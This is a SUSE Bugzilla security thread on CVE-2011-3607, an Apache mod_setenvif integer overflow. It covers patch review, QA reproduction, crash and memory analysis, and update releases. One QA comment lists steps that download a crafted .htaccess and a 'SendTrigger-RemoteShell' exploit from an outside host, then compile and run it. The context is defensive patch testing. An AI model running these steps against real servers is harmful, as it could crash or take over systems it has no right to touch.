Bugzilla – Bug 729181
VUL-0: CVE-2011-3607: apache2: integer overflow leading to a heap buffer overflow
Last modified: 2019-05-01 15:39:14 UTC
----------------------------------------------------------------------- Name: CVE-2011-3607 Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow. Reference: CONFIRM: https://bugzilla.redhat.com/show_bug.cgi?id=750935 Reference: CONFIRM: https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/811422 Reference: XF: http://xforce.iss.net/xforce/xfdb/71093 Reference: BID: http://www.securityfocus.com/bid/50494 Reference: OSVDB: http://www.osvdb.org/76744 Reference: MISC: http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html Reference: MISC: http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/ Reference: SECTRACK: http://securitytracker.com/id?1026267 Reference: SECUNIA: http://secunia.com/advisories/45793 Reference: FULLDISC: http://archives.neohapsis.com/archives/fulldisclosure/2011-11/0023.html -----------------------------------------------------------------------
http://svn.apache.org/viewvc?view=revision&revision=1198940
The fix referred to in comment#1 is inappropriate. If causes the function in question to conditionally return APR_ENOMEM;, which contradicts function declaration AP_DECLARE(char *) ap_pregsub(); Inquiring with upstream.
was not able to use DemoExploit from http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/DemoExploit.html could you be so kind to help me for qa maintenace testing?
any news about: how to use the reproducer? from comment #0
I visited Andrej in his office just a minute ago. The issue was that the default-server.conf contained "AllowOverride: none" which will make apache2 ignore the .htaccess configuration directives and thus the issue wasn't reproducible too. I also recommended to examine this one with gdb in order to make sure the patch is at the correct position.
int len; should also be apr_size_t len; here. (apr_size_t is either unsigned int or unsigned long)
Marcus, does this explain the arch dependent crash? I'm puzzled - this should be caught. Andrej, can you please confirm (via changelog?) that the correct packages have been installed on ppc and s390x? Thanks, Roman.
it does.
C -> assembler is tricky here and the signed overflow is not defined ... not sure why it only crashed on some platforms. als apr_size_t will be unsigned long on 64bit, so "int len" would have had troubles in either case
to comment #8 rpm -q apache2 --changelog | head -n 28 * Do Nov 24 2011 draht@suse.de - httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make non-ascii eg UTF8 passwords work with mod_authnz_ldap. [bnc#727071] * Do Nov 24 2011 draht@suse.de - httpd-2.2.x-bnc727993-CVE-2009-3555-ssl_reneg.diff turns off SSL renegotiation [bnc#727993]. This is a partial fix for CVE-2009-3555. - httpd-2.2.x-bnc729181-CVE-2011-3607-int_overflow.diff fixes an integer overflow in server/util.c also known as CVE-2011-3607. [bnc#729181]. Please note that the alleged denial of service weakness with resource starvation in mod_setenv from environment variables via .htaccess files, known as CVE-2011-4415, is NOT addressed with this patch. CVE-2011-4415 must be handled by the administrator's configuration of the system, because local users who can change the according settings that are subject to this CVE are trusted. - Add SSLProtocol directive to /etc/apache2/vhosts.d/vhost-ssl.template: Allow TLSv1 only, disallow SSLv2 and SSLv3. Note that this is a template file, no default configuration change! Also: Section SetEnvIf User-Agent ".*MSIE.*" commented out to treat it as an illustrative example. [bnc#688472] - httpd-2.2.x-CVE-2011-3368_CVE-2011-4317-bnc722545.diff is a fix for CVE-2011-4317, which is to be seen a variant of CVE-2011-3368 which was addressed below in httpd-2.2.x-CVE-2011-3368-server_protocl_c.diff. [bnc#722545] apache2-2.2.3-16.40.1
package submitted to sle10-sp4, sle11-sp1, sles9-sp[3-T*],4 as well as 11.3,4, 12.1. removed needinfo. reassigned to security-team@ for shipping+handling. :) Thank you!
Update released for: apache2, apache2-debuginfo, apache2-debugsource, apache2-devel, apache2-doc, apache2-event, apache2-event-debuginfo, apache2-example-certificates, apache2-example-pages, apache2-itk, apache2-itk-debuginfo, apache2-prefork, apache2-prefork-debuginfo, apache2-utils, apache2-utils-debuginfo, apache2-worker, apache2-worker-debuginfo Products: openSUSE 11.4 (debug, i586, x86_64)
Update released for: apache2, apache2-debuginfo, apache2-debugsource, apache2-devel, apache2-doc, apache2-event, apache2-example-pages, apache2-prefork, apache2-utils, apache2-worker Products: SLE-DEBUGINFO 11-SP1 (i386, ia64, ppc64, s390x, x86_64) SLE-SDK 11-SP1 (i386, ia64, ppc64, s390x, x86_64) SLE-SERVER 11-SP1 (i386, ia64, ppc64, s390x, x86_64) SLE-SERVER 11-SP1-TERADATA (x86_64) SLES4VMWARE 11-SP1 (i386, x86_64)
Update released for: apache2, apache2-devel, apache2-doc, apache2-example-pages, apache2-leader, apache2-metuxmpm, apache2-perchild, apache2-prefork, apache2-worker, libapr0 Products: SUSE-CORE 9-LTSS (i386, s390, s390x, x86_64)
Update released for: apache2, apache2-debuginfo, apache2-devel, apache2-doc, apache2-event, apache2-example-pages, apache2-prefork, apache2-worker Products: SLE-SERVER 10-SP3-TERADATA (x86_64)
Update released for: apache2, apache2-debuginfo, apache2-devel, apache2-doc, apache2-event, apache2-example-pages, apache2-prefork, apache2-worker Products: SLE-DEBUGINFO 10-SP4 (i386, ia64, ppc, s390x, x86_64) SLE-SDK 10-SP4 (i386, ia64, ppc, s390x, x86_64) SLE-SERVER 10-SP4 (i386, ia64, ppc, s390x, x86_64)
Update released for: apache2, apache2-devel, apache2-doc, apache2-example-pages, apache2-leader, apache2-metuxmpm, apache2-perchild, apache2-prefork, apache2-worker, libapr0 Products: SUSE-CORE 9-SP3-TERADATA (x86_64)
When testing the prepared maintenance update Products: SLE-DEBUGINFO 10-SP3 (i386, s390x, x86_64), SLE-SERVER 10-SP3-LTSS (i386, s390x, x86_64) Category: security ZYPP Patch No: 8453 MD5 sum: 25e42b7bd84d54954a51c9fe38e777e0 SUBSWAMPID: 51067 Packager: draht@suse.com Bugs: 777260, 757710, 741243, 743743, 738855, 736706, 719236, 722545, 727993, 688472, 729181, 727071 Packages: apache2 >= 2.2.3-16.32.45.1, apache2-devel >= 2.2.3-16.32.45.1, apache2-doc >= 2.2.3-16.32.45.1, apache2-example-pages >= 2.2.3-16.32.45.1, apache2-prefork >= 2.2.3-16.32.45.1, apache2-worker >= 2.2.3-16.32.45.1 SRCRPMs: apache2 I still see segfaults of apache2 when running the test case from ::: How to reproduce: --- snip --- mkdir -p /srv/www/htdocs/test wget -O /srv/www/htdocs/test/.htaccess http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/3Thread-htaccess set "AllowOverride ALL" in /etc/apache2/default-server.conf cd /tmp wget http://www.halfdog.net/Security/2011/ApacheModSetEnvIfIntegerOverflow/SendTrigger-RemoteShell.c gcc -o SendTrigger-RemoteShell.sh SendTrigger-RemoteShell.c chmod +x SendTrigger-RemoteShell.sh ./SendTrigger-RemoteShell.sh (maybe you have to repeat that a few times) --- snip --- After that /var/log/apache2/error_log has: [Mon Feb 25 16:23:39 2013] [notice] child pid 7886 exit signal Segmentation fault (11) Interestingly, the behavious seemed to have changed since now on the first runs apache2 allocates a lot of memory (haven't seen that with the older version): Cpu(s): 0.8%us, 7.1%sy, 0.0%ni, 45.3%id, 45.8%wa, 0.0%hi, 0.8%si, 0.0%st Mem: 3917928k total, 3894260k used, 23668k free, 3980k buffers Swap: 2097144k total, 872792k used, 1224352k free, 2892k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 7885 wwwrun 18 0 4315m 3.6g 148 R 9 97.6 0:04.27 httpd2-prefork
It is yet again an indication of allocation of overcommitted memory I think. #0 0x00002ba71251730b in memset () from /lib64/libc.so.6 dest = dst = apr_pcalloc(p, len + 1); + if(!dest) + return NULL; So basically the "if (!dest) return NULL;" case should optimistically have triggered, but due to the memory overcommit of the Linux system it cannot do it, but later segfaults during memset() as it has no pages available. That repeated tries of the exploit are needed is a bit strange, as it indicates memory leaks.
./modules/metadata/mod_setenvif.c if (!b->pattern) { char *replaced = ap_pregsub(r->pool, elts[j].val, val, AP_MAX_REG_MATCH, regm); if (replaced) { apr_table_setn(r->subprocess_env, elts[j].key, replaced); } } else { apr_table_setn(r->subprocess_env, elts[j].key, elts[j].val); } It keeps the compiled very large patterns in the "r->subprocess_env", so it will stay as long as the current worker instance runs (I think...) apr_table_setn() seems to overwrite the old value without freeing it. r->subprocess_env is allocated from r->pool so it should actually be freed on request end?
We are currently releasing the update despite this "out of memory denial of service" as it can be caused only by .htaccess setenvif things. The original bug, code execution via this problem, is solved however.
Update released for: apache2, apache2-debuginfo, apache2-devel, apache2-doc, apache2-event, apache2-example-pages, apache2-prefork, apache2-worker Products: SLE-DEBUGINFO 10-SP3 (i386, s390x, x86_64) SLE-SERVER 10-SP3-LTSS (i386, s390x, x86_64)